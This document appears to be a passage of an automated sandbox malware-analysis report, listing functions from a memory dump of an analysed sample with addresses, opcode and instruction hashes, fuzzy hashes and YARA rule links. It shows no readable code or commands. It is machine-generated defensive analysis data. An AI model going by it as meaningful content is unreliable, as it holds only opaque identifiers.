                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a3ae93cdf984099573b856687578578ada45ea381246b6109f59ea11087d405
                                                  • Instruction ID: a22b979e2fc82a810075af236466f6d98bb9b246b0935a26468ab84becba3357
                                                  • Opcode Fuzzy Hash: 7a3ae93cdf984099573b856687578578ada45ea381246b6109f59ea11087d405
                                                  • Instruction Fuzzy Hash: 25D02E21F0180D0DEB18B3B43C769FDF299EFCA208BC100B2E81DC30CBCC292A120282
                                                  Function 00007FFD9B8873F0 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a278fa14dcb127530b11d407bcbe30aa6a379972a48973e2926ea91d01f627fe
                                                  • Instruction ID: 20c5501326c0aa3cf6946707d18c86635a59553ed548ad4f5b86983ed92af970
                                                  • Opcode Fuzzy Hash: a278fa14dcb127530b11d407bcbe30aa6a379972a48973e2926ea91d01f627fe
                                                  • Instruction Fuzzy Hash: 26E08C30609A084B8788EA2C848C92B7FE4DBEC365F180B3FB44CD3270DE3086408789
                                                  Function 00007FFD9B89E410 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7630ef9fb1f334e2433ad397a6148ded89ece25d6c0615de20e6851c9e81361
                                                  • Instruction ID: 8dccfa76d8fc10dab488a0b6f99277dee98a9fc9173d55a74ea282c18f0bcf13
                                                  • Opcode Fuzzy Hash: a7630ef9fb1f334e2433ad397a6148ded89ece25d6c0615de20e6851c9e81361
                                                  • Instruction Fuzzy Hash: 1CD05E52B22E0D07E75CA77E0C9D275B7C3E7E8252FC583729808C22A5EC6965860605
                                                  Function 00007FFD9B87E62A Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                  • Instruction ID: cbe0c3304b91fd9285879214274833f8568320dc5ef4f0acbf091091acb9dcbd
                                                  • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                  • Instruction Fuzzy Hash: 0FD01223B0E41D49E5A8A384B4A32FC7384EB4923AB51103BD14EC28A29C0961112181
                                                  Function 00007FFD9B876C19 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9d359e48bea6c2c69057e49b556cb4fcda8cd9b1f58bd49b47ffe134b17719b
                                                  • Instruction ID: cd441bdedd5c04fab1092c4765350cd115683b5cc2ed0cd5eca04a88bdb19748
                                                  • Opcode Fuzzy Hash: e9d359e48bea6c2c69057e49b556cb4fcda8cd9b1f58bd49b47ffe134b17719b
                                                  • Instruction Fuzzy Hash: AEE0D81080E3950FE72297A86865AA13FA0DF47214F0E42DAE088CB093C24D5AD58352
                                                  Function 00007FFD9B887B48 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c65b5bdc745e5341f3385fcfcbc81f69ee999b3b7a666f1b6bfc6cd993ac543
                                                  • Instruction ID: 0f58b1fec066b117225f852f0ab0acc753265960261f274135483b2d62b42a33
                                                  • Opcode Fuzzy Hash: 3c65b5bdc745e5341f3385fcfcbc81f69ee999b3b7a666f1b6bfc6cd993ac543
                                                  • Instruction Fuzzy Hash: B0E09A35608D5E4F9FC9FE188450AAA73A2FBA8700B604554D419C328ECA34ED82CB81
                                                  Function 00007FFD9B87F35D Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4523dd51ecc9fcdfbb4622ba82e6beb3440f0249b5f02a9903ec89397ed0fe2
                                                  • Instruction ID: caffd27bcd34bf33c698f07e1c725367a57867b7eb34abe1e80f860a3f1945cb
                                                  • Opcode Fuzzy Hash: d4523dd51ecc9fcdfbb4622ba82e6beb3440f0249b5f02a9903ec89397ed0fe2
                                                  • Instruction Fuzzy Hash: F0E0DF2165D38D0FD703676488301D4BB31EF92300F0601ABE081DA2D6DD5E461B8343
                                                  Function 00007FFD9B8AB590 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfc5d436cfb09916ca42e3c099cba37a9f1e7b64c42c61f7401f06575df51c6c
                                                  • Instruction ID: b00e486812f24ed343d2d2d86549157ed863597f87fb92e4016315362ab89cf9
                                                  • Opcode Fuzzy Hash: dfc5d436cfb09916ca42e3c099cba37a9f1e7b64c42c61f7401f06575df51c6c
                                                  • Instruction Fuzzy Hash: 10D01D20B14E1D4BDBB8BB7450557A571E0FB18314F410965D01AC3589DF78AD4543C1
                                                  Function 00007FFD9B889A30 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d2aede4308d47a8e1d08fc91ea1dc657459c7f75322d4bb77ef79dfab4462d11
                                                  • Instruction ID: 77af42b0126072fc9b36a7b61515dabc29e1c946d0ed84e2ae2e30a073d9e4b2
                                                  • Opcode Fuzzy Hash: d2aede4308d47a8e1d08fc91ea1dc657459c7f75322d4bb77ef79dfab4462d11
                                                  • Instruction Fuzzy Hash: 64E0C27092AB5D9EE394BB685C1A2A9B5A0FF1A304F410A6BB418C2152EA6415844BC2
                                                  Function 00007FFD9B87822C Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0988cfa05a1b5454cb30f9a18bbf7a9324b88c50c44881bccab85ff3f3bfbce9
                                                  • Instruction ID: 386540deef2fd1a7dce49d4d4091716df7d11395ed45d54905698e6eb473de4a
                                                  • Opcode Fuzzy Hash: 0988cfa05a1b5454cb30f9a18bbf7a9324b88c50c44881bccab85ff3f3bfbce9
                                                  • Instruction Fuzzy Hash: 24D0C712F088190EEB89B65C64156FD7192DBC9315F441076E52EC32CBDD1958920251
                                                  Function 00007FFD9B87E731 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e29deb71ddc9f0f1ad793eeaa1c0e0c859d856b27a61e991ae48a9bd87e35e9
                                                  • Instruction ID: b0629c86c409d600f55d64713582d5c355403f48527f5baa15c335f35d9e46f4
                                                  • Opcode Fuzzy Hash: 2e29deb71ddc9f0f1ad793eeaa1c0e0c859d856b27a61e991ae48a9bd87e35e9
                                                  • Instruction Fuzzy Hash: EED02B2191CE8A47DF0CEA284811458F791EF6874471444ADD41A835C7ED30F8064742
                                                  Function 00007FFD9B8708FE Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18b9c9b0975dfcde72ea0ebc517db83135130aba4dd8abc7e442c1850b80e5b
                                                  • Instruction ID: cdb4a5c598861ccf7a395b86d4cd165d361d0cfe3dc2655e0b8c8f6bc5f9ab96
                                                  • Opcode Fuzzy Hash: b18b9c9b0975dfcde72ea0ebc517db83135130aba4dd8abc7e442c1850b80e5b
                                                  • Instruction Fuzzy Hash: 93D0123251C7094BC7149B54E8508DAB7A0FB88368F400B39E0AAD21E5DB6893818682
                                                  Function 00007FFD9B882E1A Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da500ebef7a58daf70a7b269037f7306a0ef3d77fc558a079f9f137279d3838c
                                                  • Instruction ID: dad714788d5e47eaed48a51e64c2fbb11b96066fc9b3058552d9a51b14efb165
                                                  • Opcode Fuzzy Hash: da500ebef7a58daf70a7b269037f7306a0ef3d77fc558a079f9f137279d3838c
                                                  • Instruction Fuzzy Hash: 2DD01262B89E1A47E6A1A688B8D16E9A3C0D7683D1F410075E195C11AAED59958BC280
                                                  Function 00007FFD9B88CCAA Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b749c3150c5c0e60085dc92ebb9b2bd40a76dd3c9574dd61f9c5074f7d76508
                                                  • Instruction ID: 2727bbc9f872ff88d549e87c5e0df8a5e7d985524dc0a708f6751b359b7407ac
                                                  • Opcode Fuzzy Hash: 9b749c3150c5c0e60085dc92ebb9b2bd40a76dd3c9574dd61f9c5074f7d76508
                                                  • Instruction Fuzzy Hash: E6C08023A4AF0D07E6A09348B4E55F577C1D754360F410273D4698016FFD5B56C6C680
                                                  Function 00007FFD9B88539A Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0839c5da7e4c62c5d1866a7d3f4201f678094f612e4b012947108e3b88e4ebc9
                                                  • Instruction ID: 3d6ba3e087a5662e5408d49f27b901f7788c9ba4d527a0c2fa44442f35d4c3fe
                                                  • Opcode Fuzzy Hash: 0839c5da7e4c62c5d1866a7d3f4201f678094f612e4b012947108e3b88e4ebc9
                                                  • Instruction Fuzzy Hash: A6C08013749E0E07F9B05688F9926E9F3C1D754BE1F414171E058C01B7ED5A66474381
                                                  Function 00007FFD9B88685A Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 018fe05d47bf280f8a67528f336db795c1968b009c6bd02a72e6897ff36e353f
                                                  • Instruction ID: 3834b2a9017314323e820e7d11f718879a8a581e41bfdc14c4d55f9bc6735945
                                                  • Opcode Fuzzy Hash: 018fe05d47bf280f8a67528f336db795c1968b009c6bd02a72e6897ff36e353f
                                                  • Instruction Fuzzy Hash: B9C0C013A0CF0A03D5A04248B4852FCF3C0E394391F400033D028C00BBFC59624743C1
                                                  Function 00007FFD9B870C57 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf4b9ee090f91a271e953875a022f59b22f3381b272803ec90d9aececc930c3f
                                                  • Instruction ID: 14743f42ef19b12b66cf6891f2f9b5350b5ee10ca6629a4cbb1b51a92766e0fe
                                                  • Opcode Fuzzy Hash: bf4b9ee090f91a271e953875a022f59b22f3381b272803ec90d9aececc930c3f
                                                  • Instruction Fuzzy Hash: 1DD0173192CB094BD344EF14E85089AB7A0FF84724F800B29B06A961E5DE6892818682
                                                  Function 00007FFD9B873F37 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18cc85d5e02b64f910c3ef38f4fd8ebe054282ba3de0ac027cd7372d6d19320e
                                                  • Instruction ID: abb30197629c31dedf775c26c549e37ff413e9a24a726fc8d988e88da693c475
                                                  • Opcode Fuzzy Hash: 18cc85d5e02b64f910c3ef38f4fd8ebe054282ba3de0ac027cd7372d6d19320e
                                                  • Instruction Fuzzy Hash: DCD05B3142C74657D344EF04D4504DAB390FF84324F400B2DF06D831D5DE6892818682
                                                  Function 00007FFD9B87F7E7 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc5639c86bace8f527dad4388274a472fd9cf2542f7948a25ad1ada88f8da2f4
                                                  • Instruction ID: f61905cb11fb8067c2c1d479e3577032a52526d51e668d0fa539f3a763e72aee
                                                  • Opcode Fuzzy Hash: bc5639c86bace8f527dad4388274a472fd9cf2542f7948a25ad1ada88f8da2f4
                                                  • Instruction Fuzzy Hash: A9C0C013B1888D03F38003CC30C10E473C2D355292F445230F089C30C0EC05560383C0
                                                  Function 00007FFD9B88D67A Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 949395381cda714060e2fee27c44f191698e3af0d630c939ca997918366694a0
                                                  • Instruction ID: acee580a6cd3d75fedb67f655cf59a41be9647165b88999200b4ee0861178dee
                                                  • Opcode Fuzzy Hash: 949395381cda714060e2fee27c44f191698e3af0d630c939ca997918366694a0
                                                  • Instruction Fuzzy Hash: B5C01212A8AE0E07D6B09A88B4D55E573C0D754691F4242769068811A9ED59664A86C1
                                                  Function 00007FFD9B8790A1 Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c52ba49beced15c90ae0f830e657865e7997484e4bbb30774a6be1f917235bb7
                                                  • Instruction ID: 872fb08221f2f3f802d5c7b80b084523514531c1dd207c0031e21e0548ce467b
                                                  • Opcode Fuzzy Hash: c52ba49beced15c90ae0f830e657865e7997484e4bbb30774a6be1f917235bb7
                                                  • Instruction Fuzzy Hash: 07D02E20A1C90E5EF731A7A840607E562E2FF18318F824431E00FC30CACD38E911A280
                                                  Function 00007FFD9B88966A Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbddfc8bbf8e7a884fb49ef12023924e920376ef263249ea13fcebbc3cd66d45
                                                  • Instruction ID: 67fade7c3416460305f8387e416f9a0450a8ba67074c6af96994c2bc75c94747
                                                  • Opcode Fuzzy Hash: fbddfc8bbf8e7a884fb49ef12023924e920376ef263249ea13fcebbc3cd66d45
                                                  • Instruction Fuzzy Hash: 83C02232508F0927EAA4CB68F0A5AA633C0DBA9350F010539906B8016ADC6A61828500
                                                  Function 00007FFD9B884617 Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7cd05d68d0aeebf0f7b6b047253cfc519b5805c668343b1ad44db26232e88fad
                                                  • Instruction ID: c225905d71bb14b28c54721353d60d04815e3ee6468e0436ba1a138fe0822321
                                                  • Opcode Fuzzy Hash: 7cd05d68d0aeebf0f7b6b047253cfc519b5805c668343b1ad44db26232e88fad
                                                  • Instruction Fuzzy Hash: F4C01253B4DD5E03F664969CA0510E5A3809B69221F590575E07885095EDB96A824380
                                                  Function 00007FFD9B889C78 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4286fb62f95c1eb002f11b268bd0a44b92d6a97f1a2ee0970a61ca933d812b8f
                                                  • Instruction ID: d46a8d51f0cda8fe3396394411121645d8e6947fc7b54c1a9d60608eae152b96
                                                  • Opcode Fuzzy Hash: 4286fb62f95c1eb002f11b268bd0a44b92d6a97f1a2ee0970a61ca933d812b8f
                                                  • Instruction Fuzzy Hash: 6FD01257A1E07690F31A7268392A4FC0F50CF0923CB0845B3D0DE090D73C8970C75198
                                                  Function 00007FFD9B887454 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff60f3be0233b6b22bf7a0d3bb7bbe5729314629dddf760b70f227b5e760c41a
                                                  • Instruction ID: 8a24de07aa01397e5ab240717d1ade3b88742db910ec567edb217575bed6ff47
                                                  • Opcode Fuzzy Hash: ff60f3be0233b6b22bf7a0d3bb7bbe5729314629dddf760b70f227b5e760c41a
                                                  • Instruction Fuzzy Hash: E1C09B05F1ED2D07E570E69CBC511B867C1D7CC53176517B7D45DC12AECC2D599201C1
                                                  Function 00007FFD9B88A7E0 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8f1ec359f15f778b14b1af3b8517f651302e6374397f27e7376b3f45bdef142
                                                  • Instruction ID: a1fa826a05022b5774034f76bfce83d23bce77bae77c9662a87a7bb450a2e136
                                                  • Opcode Fuzzy Hash: d8f1ec359f15f778b14b1af3b8517f651302e6374397f27e7376b3f45bdef142
                                                  • Instruction Fuzzy Hash: 6BD0A79192E45925F7687568143267144519B29328F1501B7640C921F7D849284C0181
                                                  Function 00007FFD9B887474 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a78a6a0f3ca3929f72aed878a27adb8a2d0b3e90799bbfe55fc63a0418971ede
                                                  • Instruction ID: 148e87af9e441a10daa9448bdea3ef397e0a1a850c7a98fe63b7b8e7659da079
                                                  • Opcode Fuzzy Hash: a78a6a0f3ca3929f72aed878a27adb8a2d0b3e90799bbfe55fc63a0418971ede
                                                  • Instruction Fuzzy Hash: 9DC09B05F1DD2D07E57066DC7C521B86781D7CC6307A517B7D41EC12AECC2D998201C1
                                                  Function 00007FFD9B887464 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91fc473351ddfdf98921296cd234465917652f7d2e2eba4e6355006f878629ad
                                                  • Instruction ID: 9dcc474234ddf975fcf2ea212ef8c62a26841cb07264fc1c2519cb39a61b3836
                                                  • Opcode Fuzzy Hash: 91fc473351ddfdf98921296cd234465917652f7d2e2eba4e6355006f878629ad
                                                  • Instruction Fuzzy Hash: 5BC09B05F1DD2D07E57066DC7C521B86781D7CC6707A517B7D41EC16AEDC2D994201C1
                                                  Function 00007FFD9B876EDF Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40d895b0e2fe99fd1a146d8873f5a9f528c954a37eb5abc326a297ae9df11acd
                                                  • Instruction ID: 909486096ea35d6f9a5d9856c29a512eb681a3f2b67bec5f73118d155efa262d
                                                  • Opcode Fuzzy Hash: 40d895b0e2fe99fd1a146d8873f5a9f528c954a37eb5abc326a297ae9df11acd
                                                  • Instruction Fuzzy Hash: 55D0C92471581D4FE784F76C84A67BE51A3EFDD608F6141B8910EC33EBCC246C824741
                                                  Function 00007FFD9B87CDBE Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9c1dea41c18a97fb1bc171843b826acab045702d9781d0b95b403084e5bbad1
                                                  • Instruction ID: afb12ae88bf28402b08871f403bbcfd705f455a6e5cd3ac760e118d66f8aa0b1
                                                  • Opcode Fuzzy Hash: a9c1dea41c18a97fb1bc171843b826acab045702d9781d0b95b403084e5bbad1
                                                  • Instruction Fuzzy Hash: 94D0123560890E4FEBC2FA1C84547A962B3FBAC755F298124D41DC334AC930D8434B41
                                                  Function 00007FFD9B883CCA Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 297a1d0dbdc33461d8ddddedb07ab7cff3c12a09df1b5bcc48d585a818a87464
                                                  • Instruction ID: 5589b119e9ddcd77e4accbf4a5875172a551c6fbd87a5769779c3047402ae2a4
                                                  • Opcode Fuzzy Hash: 297a1d0dbdc33461d8ddddedb07ab7cff3c12a09df1b5bcc48d585a818a87464
                                                  • Instruction Fuzzy Hash: 27C08013E59F0A17EFB44344F4D55A923C1EB54790F454071B469C017BEC5955874641
                                                  Function 00007FFD9B888167 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
